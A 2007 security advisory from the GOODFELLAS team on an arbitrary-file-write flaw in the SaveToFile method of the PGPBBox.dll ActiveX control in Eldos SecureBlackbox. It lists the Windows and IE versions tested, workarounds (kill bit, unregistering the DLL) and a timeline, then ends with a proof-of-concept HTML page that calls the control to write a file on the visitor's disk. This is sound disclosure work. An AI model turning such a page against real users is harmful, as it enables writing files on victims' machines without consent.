pgpbbox-write.txt
Posted on 13 July 2007
:. GOODFELLAS Security Research TEAM .: :. http://goodfellas.shellcode.com.ar .: PGPBBox.dll 5.1.0.112 SecureBlackbox Arbitary Data Write Exploit. ================================================================ Test in patched XP SP2 IE 6.0/7.0 and Vista IE 7.0 ================================================== Internal ID: VULWAR200707121. Introduction ------------ PGPBBox.dll is a library included in the SecureBlackbox software package from the Eldos Company http://www.eldos.com/ Tested In --------- - Windows XP SP2 english/french with IE 6.0 / 7.0. - Windows vista Professional English/French SP1 with IE 7.0 Summary ------- The SaveToFile method doesn't check if it's is being called from the application, or malicious users. Remote Attacker could craft a html page and write arbitrary data. Impact ------ Any computer that uses this Sofware will be exposed to Data Write Arbitrary. Workaround ---------- - Activate the Kill bit zero in clsid: C22BB435-9B7F-4B1F-ACBD-CD36D34D6DFF. - Unregister PGPBBox.dll using regsvr32. Timeline -------- July 12, 2007 -- Bug discovery. July 12, 2007 -- Bug published. Credits ------- * callAX <callax@shellcode.com.ar * GoodFellas Security Research Team <goodfellas.shellcode.com.ar> Technical Details ----------------- SaveToFile method receives one argument filename in this format "c:pathfile". Proof of Concept ---------------- <HTML> <BODY> <object id=ctrl classid="clsid:{C22BB435-9B7F-4B1F-ACBD-CD36D34D6DFF}"></object> <SCRIPT> function Poc() { arg2="c:\arbitrary_file.txt" ctrl.SaveToFile(arg2) } </SCRIPT> <input language=JavaScript onclick=Poc() type=button value="Proof of Concept"> </BODY> </HTML>